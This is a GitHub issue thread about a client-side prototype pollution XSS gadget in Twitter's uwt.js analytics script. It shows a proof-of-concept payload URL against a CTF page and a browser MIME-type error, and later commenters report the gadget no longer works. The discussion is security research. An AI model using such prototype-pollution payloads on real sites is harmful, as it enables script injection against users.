BlackFan
commented
3 years ago Hi this payload works for me in all tested browsers.
Check the HTTP response /i/adsct which returns an error, there should be twttr.conversion.loadPixels({}).
Closed dexter-morgan closed 3 years ago
BlackFan
commented
3 years ago Hi this payload works for me in all tested browsers.
Check the HTTP response /i/adsct which returns an error, there should be twttr.conversion.loadPixels({}).
halfluke
commented
2 years ago Sorry for "reopening" this, but it looks like this gadget no longer works in any browser: no XSS is triggered. Has it been fixed?
BlackFan
commented
2 years ago Yes, it looks like uwt.js was rewritten a few months ago and no longer contains the loadPixels function that was used in the gadget.
halfluke
commented
2 years ago Thank you for confirming :)
Hi Sergey!
I was trying to trigger an XSS on https://ctf.nikitastupin.com/pp/known.html?__proto__[hif][]=javascript:alert(document.domain) by following https://github.com/BlackFan/client-side-prototype-pollution/blob/master/gadgets/twitter-uwt.md. I got the following error on Chrome:
_Refused to execute script from 'https://analytics.twitter.com/i/adsct?type=javascript&version=1.1.0&p_id=Twitter&p_user_id=0&txn_id=twitter_pixel_id&events=%5B%5B%22pageview%22%2Cnull%5D%5D&tw_sale_amount=0&tw_order_quantity=0&tw_iframe_status=0&tpx_cb=twttr.conversion.loadPixels&tw_document_href=https%3A%2F%2Fctf.nikitastupin.com%2Fpp%2Fknown.html%3F__proto__%5Bhif%5D%5B%5D%3Djavascript%3Aalert(document.domain)' because its MIME type ('text/html') is not executable, and strict MIME type checking is enabled._
Could you advise if you see a workaround here?
Thanks and cheers!